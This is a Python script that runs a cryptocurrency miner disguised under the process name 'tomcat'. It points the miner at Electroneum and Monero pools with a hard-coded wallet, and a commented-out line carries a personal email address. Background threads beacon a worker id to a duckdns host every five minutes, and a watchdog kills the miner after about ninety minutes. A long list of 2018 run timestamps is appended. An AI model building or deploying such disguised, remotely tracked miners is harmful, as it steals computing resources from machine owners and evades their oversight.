import os, requests, datetime, threading
from time import sleep

def os_print(text):
    os.system('echo {text}'.format(text=text))

def send_signal(is_beacon=False):
    with open('id', 'r') as f:
        worker_name = f.read()
    if is_beacon:
        url = 'http://anthill.duckdns.org:1784/cms/beacon/'
    else:
        url = 'http://anthill.duckdns.org:1784/cms/'
    try:
        requests.post(url, data={'worker': worker_name}, timeout=5)
    except:
        print('err send_signal()')

class WatchDog():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        sleep(self.interval)
        os_print('WatchDog - {dt}'.format(dt=datetime.datetime.now()))
        os.system('killall tomcat')
        send_signal(is_beacon=False)

class Beacon():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        for i in range(0, 18) :
            os_print('{dt}'.format(dt=datetime.datetime.now()))
            send_signal(is_beacon=True)
            sleep(self.interval)

def main():
    Beacon(60*5)  # 5 min
    WatchDog((60*90)+60)  #5400 1.5 h
    #os.system('./tomcat -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://bcn.pool.minergate.com:45550 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://etn.easyhash.io:3630 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os.system('./tomcat -a cryptonight -o stratum+tcp://etn-us-west1.nanopool.org:13333 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os_print('FINISH!!!')

if __name__ == '__main__':
    main()

#2018-02-17 15:44:05.804248
#2018-02-17 17:33:03.529554
#2018-02-17 19:21:05.238863
#2018-02-17 21:10:08.112744
#2018-02-17 22:54:02.049255
#2018-02-18 00:39:03.778951
#2018-02-18 02:29:04.610380
#2018-02-18 04:16:04.920497
#2018-02-18 06:08:02.039641
#2018-02-18 07:59:06.700934
#2018-02-18 09:47:07.358050
#2018-02-18 11:34:05.863830
#2018-02-18 13:19:06.315841
#2018-02-18 15:10:07.046359
#2018-02-18 16:58:02.166056
#2018-02-18 18:45:07.300412
#2018-02-18 20:31:06.227175
#2018-02-18 22:17:06.329379
#2018-02-19 00:06:06.778225
#2018-02-19 01:52:04.124106
#2018-02-19 03:39:07.461000
#2018-02-19 05:24:01.256307
#2018-02-19 07:11:07.419592
#2018-02-19 08:59:04.507960
#2018-02-19 10:48:06.512755
#2018-02-19 12:36:08.369550
#2018-02-19 14:24:04.206374
#2018-02-19 16:12:06.543342
#2018-02-19 18:00:09.536097
#2018-02-19 19:46:06.072640
#2018-02-19 21:33:04.120355
#2018-02-19 23:19:04.559632
#2018-02-20 01:05:08.506208
#2018-02-20 02:55:03.328645
#2018-02-20 04:43:01.772089
#2018-02-20 06:27:06.287966
#2018-02-20 08:12:06.015148
#2018-02-20 09:59:08.257342
#2018-02-20 11:45:07.550416
#2018-02-20 13:33:01.715332
#2018-02-20 15:16:08.831184
#2018-02-20 17:03:06.974201
#2018-02-20 18:52:10.967334
#2018-02-20 20:44:01.785709
#2018-02-20 22:28:02.131216
#2018-02-21 00:09:04.756626
#2018-02-21 01:54:06.167975
#2018-02-21 03:44:03.694545
#2018-02-21 05:32:05.222866
#2018-02-21 07:20:06.380417
#2018-02-21 09:04:08.171800
#2018-02-21 10:52:02.197046
#2018-02-21 12:38:04.504966
#2018-02-21 14:24:08.022603
#2018-02-21 16:11:07.387554
#2018-02-21 18:03:04.806427
#2018-02-21 19:50:10.862212
#2018-02-21 21:38:04.517913
#2018-02-21 23:26:08.130843
#2018-02-22 01:15:07.107183
#2018-02-22 03:06:05.696982
#2018-02-22 04:50:07.974192
#2018-02-22 06:37:01.881751
#2018-02-22 08:25:01.711840
#2018-02-22 10:11:09.739124
#2018-02-22 11:57:08.126172
#2018-02-22 13:42:05.945090
#2018-02-22 15:31:06.464165
#2018-02-22 17:17:08.439209
#2018-02-22 19:04:08.149533
#2018-02-22 20:56:05.714421
#2018-02-22 22:43:05.935392
#2018-02-23 00:31:08.072815
#2018-02-23 02:17:01.342689
#2018-02-23 04:04:07.318627
#2018-02-23 05:52:07.505831
#2018-02-23 07:41:03.738897
#2018-02-23 09:46:07.144128
#2018-02-23 11:52:05.269112
#2018-02-23 13:40:08.908664
#2018-02-23 15:27:09.048829
#2018-02-23 17:18:10.699991
#2018-02-23 19:04:05.434628
#2018-02-23 20:50:10.330454
#2018-02-23 22:37:06.181259
#2018-02-24 00:23:06.029288
#2018-02-24 02:14:07.316670
#2018-02-24 04:04:06.067548
#2018-02-24 05:52:06.517412
#2018-02-24 07:41:01.692402
#2018-02-24 09:26:07.582266
#2018-02-24 11:20:06.938146
#2018-02-24 13:09:05.476980
#2018-02-24 14:59:03.658562
#2018-02-24 16:49:07.135311
#2018-02-24 18:37:04.977193
#2018-02-24 20:28:07.130302
#2018-02-24 22:24:07.240698
#2018-02-25 01:32:01.556699
#2018-02-25 04:28:05.912642
#2018-02-25 08:09:05.057569